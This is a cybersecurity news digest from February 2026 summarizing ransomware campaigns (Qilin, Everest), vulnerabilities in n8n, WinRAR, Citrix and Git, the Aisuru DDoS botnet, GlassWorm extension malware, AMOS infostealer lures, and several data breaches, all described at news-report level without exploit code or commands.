
News Summary

Last updated: 19:00 05/02/2026 UTC
  • Qilin ransomware group targets multiple organizations, including South Korean financial sector and Romanian oil pipeline operator Conpet: The Qilin ransomware group has been active, targeting multiple organizations, including Inotiv, a U.S.-based pharmaceutical company; Creative Box Inc. (CBI), a subsidiary of Nissan; Mecklenburg County Public Schools (MCPS); Asahi Group; Synnovis, a UK pathology services provider; and Conpet, Romania's national oil pipeline operator. The latest attack was on Conpet, where Qilin claims to have stolen nearly 1TB of documents and leaked over a dozen photos of internal documents containing financial information and passport scans as proof of the breach. The attack caused significant operational disruption, including the temporary takedown of the company's website. The group has also targeted other Japanese companies, including Shinko Plastics and Osaki Medical. The Qilin ransomware group operates as a ransomware-as-a-service (RaaS) network, providing tools and infrastructure to affiliates and taking a 15–20% share of ransom payments. The group's malware is custom-built in Rust and C for cross-platform attacks, including Windows, Linux, and ESXi systems. The Qilin ransomware operation was first launched as "Agenda" in August 2022 and rebranded to Qilin by September 2022. The Qilin ransomware operation has attacked more than 700 victims across 62 countries in 2025 and has published over 40 new victims per month in the second half of 2025. The operation uses the Windows Subsystem for Linux (WSL) to execute Linux encryptors on Windows systems, evading traditional security tools. The group has been observed exploiting unpatched VPN appliances and the lack of multi-factor authentication (MFA) to gain initial access to corporate networks, and targeting small-to-medium-sized businesses in the construction, healthcare, and financial sectors. 
The group has also been observed using new extortion channels, including Telegram and public sites such as WikiLeaksV2; collaborating with affiliates of the Scattered Spider group; operating as a ransomware-as-a-service (RaaS) group since 2023, leasing its tools and infrastructure to affiliates; and publishing victims' data on dark-web leak sites if no ransom is paid. Asahi Group Holdings confirmed that the personal data of approximately 1.914 million individuals, including 1.525 million customers, was or may have been exposed in the cyber-attack. The exposed data includes names, genders, dates of birth, postal addresses, email addresses, and phone numbers. Asahi Group Holdings spent two months investigating the breach, conducting root cause analysis, integrity checks, containing the ransomware, restoring systems, and strengthening security. Atsushi Katsuki, President and Group CEO of Asahi Group Holdings, publicly apologized for the difficulties caused by the disruptions. Asahi Group Holdings is reviewing the potential impact of the incident on its financial results for fiscal year 2025. The Qilin ransomware group claimed responsibility for the cyber-attack on Asahi Group Holdings. Asahi Group Holdings temporarily suspended its operations in Japan in late September following a system failure due to the ransomware attack. The disruptions included order and shipment operations, call centers, and customer service desks. Asahi Group Holdings postponed the launch of a new product scheduled to be released in October due to the cyber-attack. On October 7, the Qilin ransomware group listed Asahi on its data leak site, claiming to have stolen 27 GB of files from the company. Inotiv is notifying 9,542 individuals that their personal information was stolen in the August 2025 ransomware attack. 
Inotiv has restored availability of and access to the networks and systems affected by the August 2025 ransomware attack. The Qilin ransomware group claimed responsibility for the breach in August 2025, leaked data samples, and said it exfiltrated over 162,000 files totaling 176 GB from Inotiv. Asahi Group Holdings is considering the creation of a dedicated cybersecurity unit within the group. Asahi Group Holdings is scrapping the use of virtual private networks (VPNs) and is adopting a stricter zero-trust model. Asahi Group Holdings has postponed the disclosure of sales performance for its operating due to the ongoing effects of the cyber-attack on its systems. Asahi Group Holdings recorded a 20% year-on-year drop in alcohol sales in Japan in November 2025 due to the cyber-attack. Asahi Group Holdings has refrained from releasing monthly sales data by category and brand due to the ongoing effects of the cyber-attack on its systems. November marks the third consecutive month Asahi Group Holdings has skipped disclosures of sales data, citing difficulties in accurately compiling the figures.
  • Multiple Critical n8n Workflow Automation Vulnerabilities (CVE-2025-68613, CVE-2025-68668, CVE-2026-21877, CVE-2026-21858): Multiple critical vulnerabilities in the n8n workflow automation platform continue to pose severe risks, with the latest flaw, CVE-2026-25049 (CVSS 9.4), enabling authenticated users to execute arbitrary system commands via malicious workflows. This vulnerability bypasses earlier patches for CVE-2025-68613 and stems from inadequate sanitization in n8n’s expression evaluation, allowing attackers to exploit mismatches between TypeScript’s compile-time type system and JavaScript’s runtime behavior. Successful exploitation can lead to server compromise, credential theft, and persistent backdoor installation, with heightened risk when paired with n8n’s public webhook feature. The vulnerabilities collectively affect over 105,000 exposed instances, primarily in the U.S. and Europe, and impact both self-hosted and cloud deployments. Earlier flaws—including CVE-2026-21877 (CVSS 10.0), CVE-2026-21858 (CVSS 10.0), and the sandbox escape vulnerabilities CVE-2026-1470 (CVSS 9.9) and CVE-2026-0863 (CVSS 8.5)—have already demonstrated the potential for full server takeover, AI workflow hijacking, and exposure of sensitive credentials (API keys, OAuth tokens, database passwords). Patches are available in versions 1.123.17, 2.4.5, 2.5.1, and 2.5.2, but unpatched systems remain at critical risk. Users are urged to upgrade immediately, restrict workflow permissions, and harden deployment environments to mitigate exposure.
  • Aisuru botnet conducts record-breaking DDoS attacks, targeting U.S. ISPs and Microsoft Azure: The Aisuru/Kimwolf botnet ecosystem has escalated its global threat, now conducting record-breaking DDoS campaigns—including a 31.4 Tbps attack in November 2025 and a holiday-themed "The Night Before Christmas" campaign (December 19, 2025) with peaks of 24 Tbps, 9 Bpps, and 205 Mrps. This follows the 29.7 Tbps assault in Q3 2025 and the disruption of the IPIDEA proxy network (January 2026), which had enabled the botnets’ lateral movement into government, healthcare, and critical infrastructure networks via 33,000+ compromised endpoints in universities and 8,000 in U.S./foreign government systems. With over 6 million infected devices (1–4M IoT for Aisuru; >2M Android TVs/boxes for Kimwolf), the botnets now blend hyper-volumetric DDoS with residential proxy monetization, targeting sectors beyond gaming to include telecom, IT, finance, and AI companies. Cloudflare reported 47.1 million DDoS attacks mitigated in 2025 (a 100% YoY increase), with hyper-volumetric incidents surging 40% QoQ in Q4—highlighting the botnets’ rapid evolution in scale, sophistication, and cross-sector impact. Despite Google’s January 2026 takedown of IPIDEA (reducing proxy devices by millions), persistent infections and new attack vectors (e.g., trojanized apps, ENS-based C2) underscore the ongoing systemic risk to global internet stability and enterprise security.
  • Path Traversal Vulnerability in WinRAR Actively Exploited by Multiple Threat Actors: A path traversal vulnerability in WinRAR (CVE-2025-8088, CVSS 8.8) is being actively exploited in the wild. The flaw allows arbitrary code execution via crafted malicious archive files. The vulnerability affects the Windows versions of WinRAR, RAR, UnRAR, the portable UnRAR source code, and UnRAR.dll. The issue was discovered by researchers from ESET and addressed in WinRAR version 7.13, released on July 30, 2025. Multiple threat actors, including Paper Werewolf, RomCom, UNC4895, APT44, TEMP.Armageddon, Turla, and China-linked actors, have exploited this vulnerability to target various organizations. A new threat actor called Amaranth Dragon, linked to APT41 state-sponsored Chinese operations, has also exploited CVE-2025-8088 in espionage attacks on government and law enforcement agencies in Singapore, Thailand, Indonesia, Cambodia, Laos, and the Philippines. The attacks involve phishing emails with malicious archives that, when opened, exploit the vulnerability to write files outside the intended directory and achieve code execution. The payloads include a .NET loader that sends system information to an external server and receives additional malware. Financially motivated actors are also exploiting the flaw to distribute commodity remote access tools and information stealers. Google Threat Intelligence Group (GTIG) revealed that multiple threat actors, including nation-state adversaries and financially motivated groups, are exploiting CVE-2025-8088. The exploit chain often involves concealing the malicious file within the alternate data streams (ADS) of a decoy file inside the archive, causing the payload to be extracted to a specific path (e.g., the Windows Startup folder) and executed automatically once the user logs in to the machine after a restart.
  • Multiple vulnerabilities in Citrix, Git, and GitLab added to CISA KEV catalog: CISA has added multiple vulnerabilities to its KEV catalog due to active exploitation. The flaws affect Citrix Session Recording, Git, and Citrix NetScaler ADC and NetScaler Gateway. The Citrix Session Recording vulnerabilities were patched in November 2024, the Git flaw (CVE-2025-48384) was addressed in July 2025, and the NetScaler vulnerabilities were patched in August 2025. Additionally, CISA has added a five-year-old GitLab vulnerability (CVE-2021-39935) to its KEV catalog, which is being actively exploited in attacks. Federal agencies must apply mitigations by September 15, 2025, for the earlier vulnerabilities, within 48 hours for the NetScaler vulnerabilities, and by February 24, 2026, for the GitLab vulnerability. The vulnerabilities are CVE-2024-8068, CVE-2024-8069, CVE-2025-48384, CVE-2025-7775, CVE-2025-7776, and CVE-2025-8424. The first two affect Citrix Session Recording, the third affects Git, and the last three affect Citrix NetScaler ADC and NetScaler Gateway. CVE-2025-48384 is an arbitrary file write vulnerability in Git due to inconsistent handling of carriage return characters in configuration files. The vulnerability affects macOS and Linux systems; Windows systems are immune due to differences in control character usage. The flaw was resolved in Git versions 2.43.7, 2.44.4, 2.45.4, 2.46.4, 2.47.3, 2.48.2, 2.49.1, and 2.50.1. The vulnerability impacts software developers using Git on workstations and CI/CD build systems. CVE-2021-39935 is a server-side request forgery (SSRF) flaw in GitLab that allows unauthenticated attackers to access the CI Lint API. The vulnerability affects GitLab CE/EE versions starting from 10.5 before 14.3.6, all versions starting from 14.4 before 14.4.4, and all versions starting from 14.5 before 14.5.2. GitLab patched the flaw in December 2021. 
CISA added the flaw to its KEV catalog on February 4, 2026, mandating that federal agencies patch it by February 24, 2026. CVE-2025-7775 is a memory overflow vulnerability leading to remote code execution and/or denial-of-service. CVE-2025-7776 is a memory overflow vulnerability leading to unpredictable behavior and denial-of-service. CVE-2025-8424 is an improper access control vulnerability in the NetScaler Management Interface. CVE-2025-7775 has been actively exploited in the wild and was added to the CISA KEV catalog on August 26, 2025, requiring federal agencies to remediate within 48 hours. The vulnerabilities affect both supported and unsupported, end-of-life versions of Citrix NetScaler ADC and NetScaler Gateway. Nearly 20% of NetScaler assets identified are on unsupported versions, primarily in North America and the APAC region. The vulnerabilities affect the same components of NetScaler ADC and NetScaler Gateway as the CitrixBleed and CitrixBleed2 vulnerabilities.
  • GPUGate Malware Campaign Targets IT Firms in Western Europe: A sophisticated malware campaign, codenamed GPUGate, targets IT and software development companies in Western Europe, with recent expansions to macOS users. The campaign leverages Google Ads, SEO poisoning, and fake GitHub commits to deliver malware, including the Atomic macOS Stealer (AMOS) and Odyssey. The attack began in December 2024 and uses a 128 MB Microsoft Software Installer (MSI) to evade detection. The malware employs GPU-gated decryption and various techniques to avoid analysis and detection. The end goal is information theft and delivery of secondary payloads. The threat actors have native Russian language proficiency and use a cross-platform approach. The campaign has expanded to target macOS users through fake Homebrew, LogMeIn, and TradingView platforms. These platforms impersonate popular tools and use SEO poisoning to distribute the Atomic Stealer malware and Odyssey. The threat actors use multiple GitHub usernames to evade takedowns and deploy malware via Terminal commands. Similar tactics have been observed in previous campaigns using malicious Google Ads and public GitHub repositories. The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems. The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. A new AMOS infostealer campaign abuses Google search ads to lure users into Grok and ChatGPT conversations that lead to installing the AMOS malware on macOS. The campaign was first spotted by researchers at Kaspersky, with a more detailed report by Huntress. 
The ClickFix attack begins with victims searching for macOS-related terms, leading to malicious instructions in AI chats. The malicious instructions are hosted on legitimate LLM platforms and contain commands to install the malware. The base64-encoded URL decodes into a bash script that loads a fake password prompt dialog. The script validates, stores, and uses the provided password to execute privileged commands, including downloading and executing the AMOS infostealer. AMOS was first documented in April 2023 and is a malware-as-a-service (MaaS) operation targeting macOS systems exclusively. AMOS added a backdoor module earlier this year, allowing operators to execute commands, log keystrokes, and drop additional payloads. AMOS is dropped as a hidden file and scans for cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem. Persistence is achieved via a LaunchDaemon running a hidden AppleScript that restarts the malware if terminated. Users are advised to be vigilant and avoid executing commands they found online, especially if they don't fully understand what they do. Kaspersky noted that asking ChatGPT if the provided instructions are safe reveals they are not. Microsoft has warned that information-stealing attacks are rapidly expanding beyond Windows to target Apple macOS environments by leveraging cross-platform languages like Python and abusing trusted platforms for distribution at scale. The tech giant's Defender Security Research Team observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. The campaigns use techniques like fileless execution, native macOS utilities, and AppleScript automation to facilitate data theft, including web browser credentials and session data, iCloud Keychain, and developer secrets. 
The starting point of these attacks is usually a malicious ad, often served through Google Ads, that redirects users searching for tools like DynamicLake and artificial intelligence (AI) tools to fake sites that employ ClickFix lures, tricking them into infecting their own machines with malware.
  • Zendesk Platform Abused for Email Flood Attacks: Cybercriminals have exploited lax authentication settings in Zendesk to flood targeted email inboxes with spam messages. The attacks abuse hundreds of Zendesk corporate customers simultaneously, sending notifications from the customers' domain names. Zendesk acknowledged the issue and is investigating additional preventive measures. The abuse involves sending ticket creation notifications from customer accounts that allow anonymous submissions. This lets attackers create support tickets with any chosen subject line, including menacing or insulting messages. The notifications appear to come from legitimate customer domains, making them harder to filter out. The spam wave started on January 18th, 2026, with victims reporting receiving hundreds of emails. Companies impacted include Discord, Tinder, Riot Games, Dropbox, CD Projekt (2k.com), Maya Mobile, NordVPN, Tennessee Department of Labor, Tennessee Department of Revenue, Lightspeed, CTL, Kahoot, Headspace, and Lime. Zendesk has introduced new safety features to detect and stop this type of spam in the future. A fresh wave of spam hit inboxes worldwide on February 4th, 2026, with users reporting being bombarded by automated emails generated through companies' unsecured Zendesk support systems. The emails had subject lines such as 'Activate your account' and similar support-style notifications appearing to originate from different companies.
Last updated: 15:46 05/02/2026 UTC
  • GlassWorm malware targets OpenVSX, VS Code registries: The GlassWorm malware campaign has resurfaced with a third wave, adding 24 new packages to OpenVSX and the Microsoft Visual Studio Marketplace. The malware uses invisible Unicode characters to hide malicious code and targets GitHub, NPM, and OpenVSX account credentials, as well as cryptocurrency wallet data. The campaign initially impacted 49 extensions, with an estimated 35,800 downloads, though this figure is inflated by bots and visibility-boosting tactics. The Eclipse Foundation has revoked leaked tokens and introduced security measures, but the threat actors pivoted to GitHub and have now returned to OpenVSX with updated command-and-control endpoints. The malware's global reach includes systems in the United States, South America, Europe, Asia, and a government entity in the Middle East. Koi Security has accessed the attackers' server and shared victim data with law enforcement. The threat actors have posted a fresh transaction to the Solana blockchain, providing an updated C2 endpoint for downloading the next-stage payload. The attacker's server was inadvertently exposed, revealing a partial list of victims spanning the U.S., South America, Europe, and Asia, including a major government entity from the Middle East. The threat actor is assessed to be Russian-speaking and uses the open-source browser extension C2 framework named RedExt as part of their infrastructure. The third wave of GlassWorm uses Rust-based implants packaged inside the extensions and targets popular tools and developer frameworks like Flutter, Vim, Yaml, Tailwind, Svelte, React Native, and Vue. Additionally, a malicious Rust package named "evm-units" was discovered, targeting Windows, macOS, and Linux systems. 
This package, uploaded to crates.io in mid-April 2025, attracted over 7,000 downloads and was designed to stealthily execute on developer machines by masquerading as an Ethereum Virtual Machine (EVM) unit helper tool. The package checks for the presence of Qihoo 360 antivirus and alters its execution flow accordingly. The references to EVM and Uniswap indicate that the supply chain incident is designed to target developers in the Web3 space. The latest development involves the compromise of a legitimate developer's resources to push malicious updates to downstream users, with the malicious extensions having previously been presented as legitimate developer utilities and collectively accumulated over 22,000 Open VSX downloads prior to the malicious releases. A new GlassWorm malware attack through compromised OpenVSX extensions focuses on stealing passwords, crypto-wallet data, and developer credentials and configurations from macOS systems. The threat actor gained access to the account of a legitimate developer (oorzc) and pushed malicious updates with the GlassWorm payload to four extensions that had been downloaded 22,000 times. GlassWorm attacks first appeared in late October, hiding the malicious code using "invisible" Unicode characters to steal cryptocurrency wallet and developer account details. The malware also supports VNC-based remote access and SOCKS proxying. Over time and across multiple attack waves, GlassWorm impacted both Microsoft's official Visual Studio Code marketplace and its open-source alternative for unsupported IDEs, OpenVSX. In a previous campaign, GlassWorm showed signs of evolution, targeting macOS systems, and its developers were working to add a replacement mechanism for the Trezor and Ledger apps. A new report from Socket's security team describes a new campaign that relied on trojanizing the following extensions: oorzc.ssh-tools v0.5.1, oorzc.i18n-tools-plus v1.6.8, oorzc.mind-map v1.0.61, oorzc.scss-to-css-compile v1.3.4. 
The malicious updates were pushed on January 30, and Socket reports that the extensions had been innocuous for two years. This suggests that the oorzc account was most likely compromised by GlassWorm operators. According to the researchers, the campaign targets macOS systems exclusively, pulling instructions from Solana transaction memos. Notably, Russian-locale systems are excluded, which may hint at the origin of the attacker. GlassWorm loads a macOS information stealer that establishes persistence on infected systems via a LaunchAgent, enabling execution at login. It harvests browser data across Firefox and Chromium, wallet extensions and wallet apps, macOS keychain data, Apple Notes databases, Safari cookies, developer secrets, and documents from the local filesystem, and exfiltrates everything to the attacker's infrastructure at 45.32.150[.]251. Socket reported the packages to the Eclipse Foundation, the operator of the Open VSX platform, and the security team confirmed unauthorized publishing access, revoked tokens, and removed the malicious releases. The only exception is oorzc.ssh-tools, which was removed completely from Open VSX after multiple malicious releases were discovered. Currently, the versions of the affected extensions on the marketplace are clean, but developers who downloaded the malicious releases should perform a full system clean-up and rotate all their secrets and passwords.
  • Windows 11 Updates Hide Password Login Option on Lock Screen: Recent Windows 11 updates since August 2025 have caused the password login option to become invisible on the lock screen, though the button remains functional. This issue affects systems with multiple sign-in options enabled, including those updated with KB5064081 or later updates on Windows 11 24H2 and 25H2. Microsoft has acknowledged the problem and has now released a fix in the January 2025 KB5074105 optional cumulative update. Users can still access the password login by hovering over the area where the icon should appear.
  • Windows 11 23H2 Shutdown Issue with System Guard Secure Launch: Windows 11 23H2 devices with System Guard Secure Launch enabled fail to shut down properly after installing the January 13, 2026, cumulative update (KB5073455). Affected systems restart instead of shutting down or entering hibernation. This issue impacts Enterprise and IoT editions of Windows 11, version 23H2, as well as Windows 10 22H2, Windows 10 Enterprise LTSC 2021, and Windows 10 Enterprise LTSC 2019 with Virtual Secure Mode (VSM) enabled. Microsoft has provided a temporary workaround for shutdown but no solution for hibernation. The company is also addressing a separate bug in the January 2026 KB5074109 update causing Remote Desktop connection failures. Microsoft has released an out-of-band update (KB5077797) to fix the shutdown issue in Windows 11 23H2.
  • Under Armour Investigates Data Breach After 72 Million Records Allegedly Exposed: Under Armour is investigating a data breach after 72 million customer records were allegedly exposed online by the Everest ransomware group. The breach reportedly occurred in November 2025, with data including email addresses, personal information, and purchase details being published on a hacking forum in January 2026. Under Armour has confirmed the investigation and stated that there is no evidence the breach affected payment systems or customer passwords. Additionally, Iron Mountain, a data storage and recovery services company, reported a breach by the Everest group, which was limited to marketing materials and did not involve customer confidential or sensitive information.
  • ShinyHunters and Scattered Spider Collaboration: The ShinyHunters and Scattered Spider collaboration, operating under the Scattered Lapsus$ Shiny Hunters (SLSH) alliance, has escalated its extortion tactics in early 2026, combining technical intrusions with psychological harassment, swatting, and media manipulation to coerce payments. A February 2026 analysis by Allison Nixon (Unit 221B) reveals the group’s unreliable and fractious nature, rooted in its origins within The Com—a decentralized cybercriminal network prone to internal betrayals and operational instability. Unlike traditional ransomware groups, SLSH does not guarantee data deletion post-payment, instead using extortion as a pretext for future fraud while deploying DDoS attacks, email floods, and threats of physical violence against executives, their families, and even security researchers. This follows a year of high-impact breaches, including the $107 million loss at the Co-operative Group (U.K.), Jaguar Land Rover’s operational shutdown, and attacks on Allianz Life, Farmers Insurance, and PornHub Premium members via the Mixpanel analytics breach. The groups leverage vishing, OAuth token abuse, and AI-enhanced tooling to exploit SaaS platforms (Okta, SharePoint, Salesforce), while law enforcement arrests (e.g., Owen Flowers, Thalha Jubair) and shutdown claims have failed to halt operations. The FBI, U.K. NCA, and Google Threat Intelligence continue tracking their adaptive tactics, now compounded by SLSH’s use of harassment as a core extortion lever, rendering traditional negotiation strategies ineffective. Victims are advised to refuse engagement beyond a firm "no payment" stance, as compliance only fuels further escalation. 
The alliance’s latest developments—including the ShinySp1d3r RaaS platform, Zendesk phishing campaigns, and targeted intrusions against financial sectors—demonstrate a multi-pronged expansion in both technical sophistication and psychological warfare, solidifying its status as a high-risk, low-trust threat actor in the cybercrime landscape.

Latest updates


Ransomware operators abuse ISPsystem VMs for stealthy payload delivery

Updated: · First: 05.02.2026 22:57 · 📰 1 src / 1 articles

Ransomware operators are exploiting virtual machines (VMs) provisioned by ISPsystem's VMmanager to host and deliver malicious payloads at scale. Researchers at Sophos observed this tactic during investigations into 'WantToCry' ransomware incidents, noting that attackers used Windows VMs with identical hostnames, suggesting default templates generated by VMmanager. The same hostnames were found in the infrastructure of multiple ransomware groups, including LockBit, Qilin, Conti, BlackCat/ALPHV, and Ursnif, as well as in various malware campaigns involving the RedLine and Lumma info-stealers. ISPsystem's VMmanager platform lets malicious actors spin up VMs for command-and-control (C2) and payload-delivery infrastructure, hiding malicious systems among thousands of innocuous ones. This complicates attribution and makes quick takedowns unlikely. The majority of the malicious VMs were hosted by a small cluster of providers with poor reputations or under sanctions, including Stark Industries Solutions Ltd., Zomro B.V., First Server Limited, Partner Hosting LTD, and JSC IOT.

Microsoft Announces Phased Retirement of Exchange Web Services (EWS) in Exchange Online

Updated: · First: 05.02.2026 20:07 · 📰 1 src / 1 articles

Microsoft plans to retire Exchange Web Services (EWS) for Exchange Online by April 2027, beginning with a phased disablement starting October 2026. EWS, a cross-platform API for accessing Exchange mailbox items, will no longer be supported in Exchange Online but will remain functional in on-premises Exchange Server installations. Administrators can manage the transition via an application allowlist, and Microsoft will conduct 'scream tests' to identify hidden dependencies. Developers are advised to migrate to the Microsoft Graph API, which offers near-complete feature parity with EWS.

Aisuru botnet conducts record-breaking DDoS attacks, targeting U.S. ISPs and Microsoft Azure

Updated: 05.02.2026 19:25 · First: 02.09.2025 18:52 · 📰 17 src / 32 articles

The **Aisuru/Kimwolf botnet ecosystem** has escalated its global threat, now conducting **record-breaking DDoS campaigns**—including a **31.4 Tbps attack in November 2025** and a **holiday-themed "The Night Before Christmas" campaign** (December 19, 2025) with peaks of **24 Tbps, 9 Bpps, and 205 Mrps**. This follows the **29.7 Tbps assault in Q3 2025** and **disruption of the IPIDEA proxy network** (January 2026), which had enabled the botnets’ **lateral movement into government, healthcare, and critical infrastructure networks** via **33,000+ compromised endpoints** in universities and **8,000 in U.S./foreign government systems**. With **over 6 million infected devices** (1–4M IoT for Aisuru; **>2M Android TVs/boxes** for Kimwolf), the botnets now blend **hyper-volumetric DDoS** with **residential proxy monetization**, targeting sectors beyond gaming to include **telecom, IT, finance, and AI companies**. Cloudflare reported **47.1 million DDoS attacks mitigated in 2025** (100% YoY increase), with **hyper-volumetric incidents surging 40% QoQ in Q4**—highlighting the botnets’ **rapid evolution in scale, sophistication, and cross-sector impact**. Despite **Google’s January 2026 takedown of IPIDEA** (reducing proxy devices by millions), persistent infections and **new attack vectors** (e.g., **trojanized apps, ENS-based C2**) underscore the ongoing systemic risk to **global internet stability and enterprise security**.

Cyberattack Disrupts La Sapienza University IT Systems

Updated: · First: 05.02.2026 19:02 · 📰 1 src / 1 articles

Rome’s La Sapienza University suffered a cyberattack that disrupted its IT systems, causing widespread operational disruptions. The university shut down its network systems as a precautionary measure to ensure data integrity and security. The attack is suspected to be ransomware, attributed to the pro-Russian threat actor Femwar02, with similarities to the Bablock/Rorschach ransomware strain. The university is working with Italian cybersecurity authorities to restore systems from backups. The university has not disclosed the ransom amount, but the risk of data leakage remains significant. Students and staff are advised to remain vigilant against phishing attacks.

Qilin ransomware group targets multiple organizations, including South Korean financial sector and Romanian oil pipeline operator Conpet

Updated: 05.02.2026 17:15 · First: 19.08.2025 17:25 · 📰 19 src / 23 articles

The Qilin ransomware group has been active against multiple organizations, including Inotiv, a U.S.-based pharmaceutical company; Creative Box Inc. (CBI), a subsidiary of Nissan; Mecklenburg County Public Schools (MCPS); Asahi Group; Synnovis, a UK pathology services provider; and Conpet, Romania's national oil pipeline operator. The latest attack was on Conpet, where Qilin claims to have stolen nearly 1TB of documents and has leaked over a dozen photos of internal documents containing financial information and passport scans as proof of the breach. The attack caused significant operational disruption, including the temporary takedown of the company's website. The group has also targeted other Japanese companies, including Shinko Plastics and Osaki Medical.

Qilin operates as a ransomware-as-a-service (RaaS) network, providing tools and infrastructure to affiliates and taking a 15–20% share of ransom payments; it has been observed leasing its tools and infrastructure to affiliates since 2023 and has collaborated with affiliates of the Scattered Spider group. The group's malware is custom-built in Rust and C for cross-platform attacks on Windows, Linux, and ESXi systems, and it uses the Windows Subsystem for Linux (WSL) to execute Linux encryptors on Windows hosts, evading traditional security tools. The operation was first launched as "Agenda" in August 2022 and rebranded to Qilin by September 2022. In 2025 it attacked more than 700 victims across 62 countries, publishing over 40 new victims per month in the second half of the year. Initial access has relied on unpatched VPN appliances and the absence of multi-factor authentication (MFA), and targets have included small-to-medium-sized businesses in the construction, healthcare, and financial sectors. Victims' data is published on dark-web leak sites if no ransom is paid, and the group has adopted new extortion channels, including Telegram and public sites such as WikiLeaksV2.

Asahi Group Holdings confirmed that the personal data of approximately 1.914 million individuals, including 1.525 million customers, was or may have been exposed in the cyber-attack, for which Qilin claimed responsibility. The exposed data includes names, genders, dates of birth, postal addresses, email addresses, and phone numbers. Asahi temporarily suspended its operations in Japan in late September following a system failure caused by the ransomware; the disruptions affected order and shipment operations, call centers, and customer service desks, and a new product launch scheduled for October was postponed. On October 7, Qilin listed Asahi on its data leak site, claiming to have stolen 27 GB of files from the company. Asahi spent two months investigating the breach, conducting root cause analysis and integrity checks, containing the ransomware, restoring systems, and strengthening security. Atsushi Katsuki, President and Group CEO of Asahi Group Holdings, publicly apologized for the difficulties caused by the disruptions, and the company is reviewing the incident's potential impact on its financial results for fiscal year 2025. Asahi is considering the creation of a dedicated cybersecurity unit within the group and is scrapping the use of virtual private networks (VPNs) in favor of a stricter zero-trust model. It has postponed the disclosure of sales performance for its operating companies because of the attack's ongoing effects on its systems, recorded a 20% year-on-year drop in alcohol sales in Japan in November 2025, and has refrained from releasing monthly sales data by category and brand; November marks the third consecutive month it has skipped these disclosures, citing difficulties in accurately compiling the figures.

Inotiv is notifying 9,542 individuals that their personal information was stolen in the August 2025 ransomware attack and has restored availability and access to the affected networks and systems. Qilin claimed responsibility for that breach in August 2025, leaked data samples, and said it had exfiltrated over 162,000 files totaling 176 GB from Inotiv.

Cloud Migration Blind Spots Addressed with Network-Layer Telemetry

Updated: · First: 05.02.2026 17:00 · 📰 1 src / 1 articles

Cloud migrations introduce security blind spots due to dynamic infrastructure and overlapping APIs, necessitating real-time visibility for effective cyber defense. Network-layer telemetry provides consistent, provider-agnostic signals for detection and investigation, overcoming the challenges of cloud log standardization. Adversaries exploit cloud environments through supply-chain compromises, infostealer-led intrusions, and misuse of managed services, highlighting the need for comprehensive network monitoring. Effective cloud security involves monitoring east-west and north-south traffic, container traffic, TLS metadata, DNS data, and flow logs. Establishing baselines, alerting on anomalies, and continuous validation are key steps in maintaining robust cloud security.

GitHub Codespaces RCE via Malicious Repository Configurations

Updated: · First: 05.02.2026 16:30 · 📰 1 src / 1 articles

Researchers at Orca Security discovered multiple attack vectors in GitHub Codespaces that allow remote code execution (RCE) by exploiting default behaviors in cloud-based development environments. These vulnerabilities enable attackers to execute arbitrary commands, steal credentials, and access sensitive resources without explicit user approval. The issue arises from the automatic execution of repository-defined configuration files, which can be manipulated to trigger malicious activities upon environment startup or when checking out a pull request.

Smartphones Critical to Police Investigations, Challenges Highlighted

Updated: · First: 05.02.2026 15:30 · 📰 1 src / 1 articles

A report from Cellebrite reveals that smartphones are now a key source of digital evidence in nearly all police investigations. The 2026 Industry Trends Report, based on interviews with 1,200 law enforcement practitioners, shows a significant increase in reliance on digital evidence, with 95% agreeing it is crucial for solving cases. Smartphones are cited as the top source of digital evidence, and agencies are reallocating resources to digital investigations. However, the complexity of digital evidence and challenges such as locked devices and training gaps are increasing workloads.

Increased Operational Efficiency in Cyber Threats

Updated: · First: 05.02.2026 14:57 · 📰 1 src / 1 articles

Recent cyber threat intelligence highlights a trend toward operational efficiency in attacker techniques. Intrusions are starting from ordinary workflows and tools, with attackers industrializing their operations through shared infrastructure, repeatable playbooks, and affiliate-style ecosystems. The focus is on reducing time between access and impact, leveraging automation, and exploiting known security gaps rather than unknown threats.

Substack Data Breach Exposes User Email Addresses and Phone Numbers

Updated: · First: 05.02.2026 14:54 · 📰 1 src / 1 articles

Substack has notified users of a data breach that occurred in October 2025, during which attackers stole email addresses and phone numbers. The breach was discovered in February 2026. The platform assured users that no credentials or financial information were accessed. A threat actor later leaked a database containing 697,313 records on BreachForums, claiming the data was scraped. Substack has patched the vulnerability and warned users about potential phishing attempts. Substack has a history of privacy incidents, including a 2020 email exposure. The platform has grown significantly since its launch in 2017, reaching five million paid subscriptions by March 2025.

China-Linked Amaranth-Dragon Exploits WinRAR Flaw in Southeast Asian Espionage Campaigns

Updated: 05.02.2026 13:50 · First: 04.02.2026 16:09 · 📰 2 src / 2 articles

Amaranth-Dragon, a China-linked threat actor, conducted targeted espionage campaigns against government and law enforcement agencies in Southeast Asia throughout 2025. The group exploited CVE-2025-8088, a WinRAR vulnerability, to deliver malicious payloads, including the Havoc C2 framework and the TGAmaranth RAT. The campaigns were timed to coincide with sensitive political and security events, demonstrating a high degree of stealth and operational discipline. The group's tactics, techniques, and procedures (TTPs) show strong links to APT41, suggesting a shared ecosystem or resource pool. The attackers leveraged the vulnerability within days of its disclosure in August 2025 and used the Havoc Framework as their command-and-control (C&C) platform.

Emergence of AI Usage Control as a Critical Security Category

Updated: · First: 05.02.2026 13:30 · 📰 1 src / 1 articles

The rapid proliferation of AI tools in enterprise environments has outpaced traditional security controls, creating a governance gap. AI Usage Control (AUC) has emerged as a new category to address this gap by focusing on real-time interaction governance rather than legacy tool-centric approaches. Enterprises are encouraged to adopt AUC to manage AI risks effectively, ensuring visibility and control over AI interactions across various platforms and tools.

Betterment Data Breach Exposes 1.4 Million Accounts

Updated: · First: 05.02.2026 13:16 · 📰 1 src / 1 articles

A data breach at Betterment, a fintech firm managing $65 billion in assets, exposed personal information of 1.4 million accounts. The breach, occurring in January 2026, involved stolen email addresses, names, geographic data, dates of birth, physical addresses, phone numbers, device information, and employment details. The attackers also sent fraudulent emails attempting to lure customers into a cryptocurrency scam. Betterment confirmed no customer accounts or login information were compromised, but the breach included significant contact information.

